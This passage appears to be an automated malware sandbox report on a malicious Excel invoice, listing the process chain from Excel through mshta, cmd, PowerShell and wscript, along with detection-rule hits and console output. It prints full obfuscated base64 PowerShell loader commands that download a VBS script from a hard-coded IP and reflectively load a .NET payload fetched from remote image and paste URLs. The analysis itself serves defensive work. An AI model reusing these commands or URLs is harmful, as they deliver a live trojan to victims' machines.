tYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_000007FE89A7352E

8_2_000007FE89A7352E

Source: Invoice A037.xls	OLE indicator, VBA macros: true
Source: CA430000.0.dr	OLE indicator, VBA macros: true

Source: Invoice A037.xls	Stream path 'MBD00090643/\x1Ole' : https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa]5142&=AJn)=3bEV;z# iMm0:[?v1J82h0O;+%\o:=uATb&?awS'Qc)U_1(!J)`qm*\|Cp26tn64$[W6hY$6;WYPmLOdpKueQL46CJ2pRAne90bKAIR7qhLL4siiVJ4fcfuzw8863WrInQRLpbD6VocSl0qdqVrm8PHK3txGQnYxj5WrnOXQwXUfsdMijy3PZOs2IKsdy4BSehCpXFjrFnFYO3h5i0OtUnVnvC5v9mO7snTFk9H1o4tqK0dYmWCyUPKvi0frPry55t6JuQypi5NQVT9QSRiHBEuLqSGQ:ltYUN#SYSiDre
Source: CA430000.0.dr	Stream path 'MBD00090643/\x1Ole' : https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa]5142&=AJn)=3bEV;z# iMm0:[?v1J82h0O;+%\o:=uATb&?awS'Qc)U_1(!J)`qm*\|Cp26tn64$[W6hY$6;WYPmLOdpKueQL46CJ2pRAne90bKAIR7qhLL4siiVJ4fcfuzw8863WrInQRLpbD6VocSl0qdqVrm8PHK3txGQnYxj5WrnOXQwXUfsdMijy3PZOs2IKsdy4BSehCpXFjrFnFYO3h5i0OtUnVnvC5v9mO7snTFk9H1o4tqK0dYmWCyUPKvi0frPry55t6JuQypi5NQVT9QSRiHBEuLqSGQ:ltYUN#SYSiDre

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2077
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2044
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2424
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2077
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2044
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2424
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2077	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2044	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2424	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2077
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2044
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2424

Source: Process Memory Space: powershell.exe PID: 2580, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3912, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.phis.troj.expl.evad.winXLS@38/53@27/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\CA430000

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9B25.tmp

Jump to behavior

Source: Invoice A037.xls	OLE indicator, Workbook stream: true
Source: CA430000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!..............P................m.......m.....}..w.............................1......(.P..............3........!...............g.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................7.@k....}..w......g.....\.......................(.P.....X.......`.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................7.@k....}..w......g.....\.......................(.P.....X.......`.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8<p.......@k....8.o.....(.P.....X.......`............... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.X.......`...............@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.....l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .........g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................g.............0.QT.....Wl.....}..w............@E......^...............(.P.....X.......`.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................g......................Wl.....}..w............@E......^...............(.P.....X.......`.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...T.......y...............D.......y.......y...............D......3D.......2...............y.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(D.......................T.....}..w......T.......D.......D......1D.....(.P.......................2.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..........................................y.....}..w............8.D.....8.D.....@"D.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................2.......\|k....}..w......y.....\.F.......D.............(.P.......................2.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".\|k.....&U.....(.P.....................H.2.....*.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm................2.......\|k....}..w......y.....\.F.......D.............(.P.......................2.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.6.0.....\|k.....&U.....(.P.....................H.2.....&.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..........................................y.....}..w..............A.......\|k.....&U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..........................................y.....}..w..............A.......\|k.....&U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..........................................y.....}..w..............A.......\|k.....&U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..........................................y.....}..w..............A.......\|k.....&U.....(.P.............................T.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .........y.....}..w..............A.......\|k.....&U.....(.P.....................H.2.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................T.......T.....}..w..............D.......D......1D.....(.P.......D......3D.....................@@..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.......................9.l....}..w....@@......\.F.......D.............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.......................9.l....}..w....@@......\.F.......D.............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.m......9.l............(.P............................. .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@@......}..w............8.m......9.l............(.P.............................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......@@......}..w............8.m......9.l............(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................@@..............0.py.....WS.....}..w............@EE.....^...............(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................@@.......................WS.....}..w............@EE.....^...............(.P.....................8...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...T.......................D...............................D......3D.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(D.......................T.....}..w......T.......D.......D......1D.....(.P.....h.......P.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............8.D.....8.D.....@"D.....(.P.....h.......P.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................9sOk....}..w............\.F.......D.............(.P.....h.......P.......(...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".Ok..... _.....(.P.....h.......P...............*.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................9sOk....}..w............\.F.......D.............(.P.....h.......P.......(...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.6.0....pOk..... _.....(.P.....h.......P...............&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P...............T.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w..............K......pOk..... _.....(.P.....h.......P.......................................

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Invoice A037.xls	Virustotal: Detection: 19%
Source: Invoice A037.xls	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9